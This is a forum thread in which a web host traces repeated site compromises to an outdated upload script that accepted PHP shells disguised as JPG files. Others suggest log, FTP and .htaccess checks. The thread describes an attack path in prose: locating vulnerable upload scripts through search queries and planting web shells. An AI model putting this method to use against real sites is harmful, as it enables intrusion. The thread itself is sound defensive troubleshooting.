Website hacking over and over, folder created

[raymon]

Hello,

I am writing this with hope there is a solution to my problem. My website got hacked several times in the past, twice in the last two months in particular. This always results in a folder named "file" created under "public_html" under which all kinds of php, jpg and html crap is uploaded. I am really clueless as how this happened.

 

I paid a closer look to my website log and there is no record of the folder being created or accessed. The only program I am suspecting at the moment is whmcs. Last year a hacker was able to login to whmcs effectively registering his own domains, so I installed an htaccess password that seems to have prevented them from accessing the whmcs admin folder but they are still able to plant their files in public_html\files

What is really amazing is that also a customer of mine was infected with phishing sites even if their website effectively carries no complicated scripts to be exploited (whmcs is only on my account).

 

I would be happy to provide the files that were on my website if needed. While my website is currently clean, I am sure I will be hacked again in the future since the gap was not addressed.

 

I did not yet upgrade to recent whmcs perhaps to avoid clearing any traces that help finding what happened.

 

Registered to: NSWEBHOST

License Type: Monthly Lease

License Expires: 2012-10-11

WHMCS Version: 5.0.3

PHP Version: 5.2.17

MySQL Version: 5.0.95-community

[bear]

This always results in a folder named "file" created under "public_html" under which all kinds of php, jpg and html crap is uploaded. I am really clueless as how this happened.

One would assume an exploit for WHMCS would generally involve WHMCS and not the public_html directory. I mean it could, but it sounds more like something else at first look.

The only program I am suspecting at the moment is whmcs.

....

What is really amazing is that also a customer of mine was infected with phishing sites even if their website effectively carries no complicated scripts to be exploited (whmcs is only on my account).

I'd be willing to guess here that it's not WHMCS but the other person's account or at the least the fact you're hosting this on the same server as user accounts. That's where I'd be looking first.

 

[EDIT]

To add; if you have access to your full domain logs, see what IP(s) hit that folder. Take those IPs and search the logs for more hits by them. Odds are good they left some sort of trail and that will help figure out where and how they got in. I would not be surprised to see some old WP or Joomla site on that same server...

[barco57]

Also check your ftp log for unauthorized ftp access. I see "hacks" like this all of the time with clients....look for __check.html and or check.php in the ftp log....if you find those you will also need to hunt down the randomly named php file they stuck in your files somewhere...that php file when opened wil have a header that makes it look like a wordpress file but it actually a shell script. Also make sure to see if there have been additions to your .htaccess file.

[raymon]

My whmcs was hacked once and used my enom credit to register new domains.

 

Ok, I finally found out what happened. this was very tricky for me, and it took me heck of a time analyzing the logs and IPs to trace the breach. The hackers exploited a script I installed long time ago called uber uploader. This is meant to make customers upload a word or jpg document. They were able to find my website through google's inurl attribute to locate the php that lets you upload the files. They were uploading phps masked as jpg to a subfolder. Not sure how this happened but the script would tell you the file was successfully uploaded and refer to a subfolder called \uploads when in effect it was uploaded to a subfolder \files

 

This is basically the reason I could not find the traces in the access log because the bad guys kept trying on accessing mywebsite.com/package/uploads folder as opposed to the real folder that in effect holds the malicious scripts.

 

This did not prove effective in the past though and they were able to implement some scripts to control my website. The malicious files included all types of malware, some to control cpanel, others for shell and one in particular is called whmcs killer, a technique I believe was used before to control my whmcs.

 

I deleted that upload script and hope this WAS indeed IT.

[bear]

Well done for finding it!

It might be worth creating a script to ban (or at least track for later bans) IPs that ask for that file instead of simply removing it, but hopefully that removes the issue.

[Jbro]

I never install third party modules as much as possible. they are all sort of people here who might be developing these modules just for getting hold of your whmcs

[jols]

I agree with the post above who suggests, "Also check your ftp log for unauthorized ftp access."

 

If for example the hacker is uploaded via FTP, then this probably means you have a keylogger on your PC, and that's how your password (hosting account access info) is being stolen, thus allowing the hacker to freely upload anything they want. Check the IPs involved in the FTP upload of any of the nefarious files. Just do a lookup at a site like http://www.maxmind.com/en/geoip_demo and it will tell you where the uploads are originating.

 

Also, with respect to keyloggers, see - http://www.qfxsoftware.com/ Their free version works plenty well to keep your key strokes from being logged, and will give you a chance to change your account passwords and do some cleanup, if indeed this is the issue.

 

Such an issue of course would be well outside of anything going on in WHMCS.

 

Another, better protection for your WHMCS admin, again if you DO have a keylogger problem, would be to insert this in your admin directory .htaccess file instead:

 

Order Deny,Allow

Deny from all

Allow from ##.###.###.##

 

Just go to whatsmyip.org, and replace the Allow from hashes with your own IP. Then no one can get into your WHMCS admin area unless they are using your computer/connection to the web. This of course will only be effective if your IP never, or hardly ever changes, which works well for most desktop connections. But if you are working while on the road, i.e. using a mobile connection, then this would likely not be a good approach.